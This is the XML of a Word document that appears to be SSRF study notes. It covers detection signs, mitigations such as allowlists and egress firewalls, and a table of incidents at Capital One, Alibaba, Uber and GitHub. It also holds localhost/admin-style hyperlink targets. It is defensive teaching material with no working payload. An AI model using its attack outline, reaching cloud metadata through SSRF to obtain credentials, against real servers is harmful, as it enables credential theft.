    <w:p w14:paraId="33F3BE5D" w14:textId="77777777" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>Metadata endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CBD10" w14:textId="33260B32" w:rsidR="009316E7" w:rsidRPr="009316E7" w:rsidRDefault="009316E7" w:rsidP="009316E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009316E7">
        <w:t>DNS to suspicious domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539E1AE" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRPr="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00C8732E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Validate and sanitize all user-provided URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893AF73" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRPr="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00C8732E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Use allowlists for acceptable domains or IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE7D16" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00C8732E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Disable unnecessary server functionalities, such as the ability to make outbound requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD907BD" w14:textId="4C86D86D" w:rsidR="00C4000D" w:rsidRDefault="00C4000D" w:rsidP="00DB5679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not fetch user-supplied URLs directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A083F" w14:textId="0C6A19D7" w:rsidR="00C4000D" w:rsidRDefault="00C4000D" w:rsidP="00DB5679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use firewalls to block internal traffic from web-facing servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D551AF" w14:textId="5FC3ABDC" w:rsidR="002C4F5E" w:rsidRPr="00C8732E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C4F5E">
        <w:t>Real-World Exploits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4803"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w14:paraId="39BFE3D3" w14:textId="77777777" w:rsidTr="002C4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DFCF1" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="603DB119" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w14:paraId="17B85389" w14:textId="77777777" w:rsidTr="002C4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E408" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>Capital One (AWS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719FBA3B" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>SSRF → Metadata access → S3 keys leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w14:paraId="47B737F8" w14:textId="77777777" w:rsidTr="002C4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96A0A" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>Alibaba Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0815CF1D" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>SSRF → Access ECS metadata and credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w14:paraId="436F5B99" w14:textId="77777777" w:rsidTr="002C4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AF3EB" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>Uber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="029C5B83" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>SSRF in redirect allowed internal API scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w14:paraId="024D8952" w14:textId="77777777" w:rsidTr="002C4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E077" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>GitHub (Bug Bounty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C50494" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="002C4F5E">
              <w:t>SSRF allowed internal service mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A81AB9F" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRDefault="00C8732E"/>
    <w:p w14:paraId="60F3FA5C" w14:textId="62BD94E9" w:rsidR="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C4F5E">
        <w:t>Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCA2275" w14:textId="27755570" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve">“SSRF exploits a trust boundary where the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server fetches attacker-supplied URLs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve"> without validation.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98B1C7" w14:textId="41023856" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve">“It’s a high-severity issue especially in </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cloud and microservice architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8FFDF" w14:textId="07180FBD" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E">
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve">“Detection involves </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network egress monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OOB payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>param fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4F5E">
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5DA0E" w14:textId="77777777" w:rsidR="002C4F5E" w:rsidRPr="002C4F5E" w:rsidRDefault="002C4F5E" w:rsidP="002C4F5E"/>
    <w:sectPr w:rsidR="002C4F5E" w:rsidRPr="002C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2AA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7344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E3B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCA2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67CC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3824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64825CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="900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9529D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E6C6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5F34DA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3776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63882"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CD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F52B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B340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96E16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15D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54532">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="567954836">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="511452662">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1209948264">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="803237419">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="377434197">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="633486713">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="75978386">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1779256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E"/>
    <w:rsid w:val="002C4F5E"/>
    <w:rsid w:val="00453B8B"/>
    <w:rsid w:val="00864C87"/>
    <w:rsid w:val="00926A19"/>
    <w:rsid w:val="009316E7"/>
    <w:rsid w:val="00A14621"/>
    <w:rsid w:val="00A85844"/>
    <w:rsid w:val="00B6290F"/>
    <w:rsid w:val="00C4000D"/>
    <w:rsid w:val="00C8732E"/>
    <w:rsid w:val="00D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89D0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{84BE92A0-AE55-4C68-8783-AF11218B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3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864C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4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4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admin" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-08T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-08T23:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>